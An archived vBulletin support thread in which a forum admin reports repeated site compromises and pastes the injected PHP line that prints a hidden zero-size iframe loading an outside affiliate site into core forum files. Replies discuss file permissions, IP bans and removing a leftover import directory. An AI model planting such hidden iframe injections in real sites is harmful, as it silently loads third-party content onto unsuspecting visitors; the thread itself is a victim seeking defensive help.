Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 08-01-2006, 07:51 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Forum keeps getting hacked

I have a slight problem with an affiliate hacker. This lil twit modifies index.php, forumdisplay.php and showthread.php with the following code.

PHP Code:
echo "<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>"
It is usually placed at the bottom of the php file. like in forumdisplay.php

PHP Code:
$show['forumsearch'] = iif (!$show['search_engine'] AND $forumperms $vbulletin->bf_ugp_forumpermissions['cansearch'] AND $vbulletin->options['enablesearches'], truefalse);
$show['forumslist'] = iif ($forumshowntruefalse);
$show['stickies'] = iif ($threadbits_sticky != ''truefalse);
echo 
"<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html>";

(
$hook vBulletinHook::fetch_hook('forumdisplay_complete')) ? eval($hook) : false
The code messes up the template and creates a number of pop-ups.

It's simple enough to fix but I want to prevent it from happening again, seems every three days or so it is back.

Can I just chmod these files or will that mess up the board even more?

Thanks,
Gil

http://www.masscops.com/forums/police_portal_index.php?
Reply With Quote
  #2  
Old 08-01-2006, 08:41 PM
davidw's Avatar
davidw davidw is offline
 
Join Date: Jul 2005
Location: Arkansas
Posts: 2,815
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

You should be able to chmod them 644 I believe
Reply With Quote
  #3  
Old 08-01-2006, 08:49 PM
bondjetta's Avatar
bondjetta bondjetta is offline
 
Join Date: Sep 2004
Location: chicago
Posts: 111
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
Originally Posted by christianb
You should be able to chmod them 644 I believe
mine are 644'd and i'm showing similar signs of this same dude on both AutomotiveArena.com and WorkSafeBoredom.com
Reply With Quote
  #4  
Old 08-01-2006, 09:12 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Yeah mine are already 644 also. Would 444 be an option?

Gonna try it and see what happens.

UPDATE:

Ok the 444 seems to be working for the time, don't know if the lil twit has tried it again or not but how was he able to do this in the first place?

I am not a security expert by any means but I think my vB is pretty secure. (renamed admin folders, htaccess etc...)

Is this some type of mysql injection or something?
Reply With Quote
  #5  
Old 08-04-2006, 07:54 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

The chmod 444 did not stop the lil twit.

On top of that the files that I did a chmod on were reverted back to 644.

Another interesting item, today just before I got hacked I had a new user join the forum.

IP Address used was 201.17.220.203

Quote:
There is a new user, bunda at MassCops - Massachusetts Law Enforcement Network

To view their profile, go here:

http://www.masscops.com/forums/member.php?u=4212

Email Address : soauker@gmail.com
Birthday :
Is there anyway I can stop this guy????
Reply With Quote
  #6  
Old 08-04-2006, 07:59 PM
davidw's Avatar
davidw davidw is offline
 
Join Date: Jul 2005
Location: Arkansas
Posts: 2,815
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

IMO, he gave himself away (the assumption it is a he). If it were me, I would block the whole HOST IP range in the vbulletin and if you have a firewall, add it to the firewall.
Reply With Quote
  #7  
Old 08-04-2006, 08:25 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Server co. says he is getting in through the impex directory....
Reply With Quote
  #8  
Old 08-04-2006, 08:40 PM
davidw's Avatar
davidw davidw is offline
 
Join Date: Jul 2005
Location: Arkansas
Posts: 2,815
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Remove impex off your system if it is no longer in use.

http://www.vbulletin.com/docs/html/impex_cleanup
Reply With Quote
  #9  
Old 08-04-2006, 08:44 PM
gbechtel gbechtel is offline
 
Join Date: Aug 2005
Posts: 75
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

already done, hope that was it...
Reply With Quote
  #10  
Old 08-04-2006, 08:45 PM
davidw's Avatar
davidw davidw is offline
 
Join Date: Jul 2005
Location: Arkansas
Posts: 2,815
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Don't forget to ban his IP addresses though :P
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 01:55 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04538 seconds
  • Memory Usage 2,260KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (2)bbcode_php
  • (2)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (1)pagenav_pagelink
  • (10)post_thanks_box
  • (10)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (10)post_thanks_postbit_info
  • (10)postbit
  • (10)postbit_onlinestatus
  • (10)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • pagenav_page
  • pagenav_complete
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete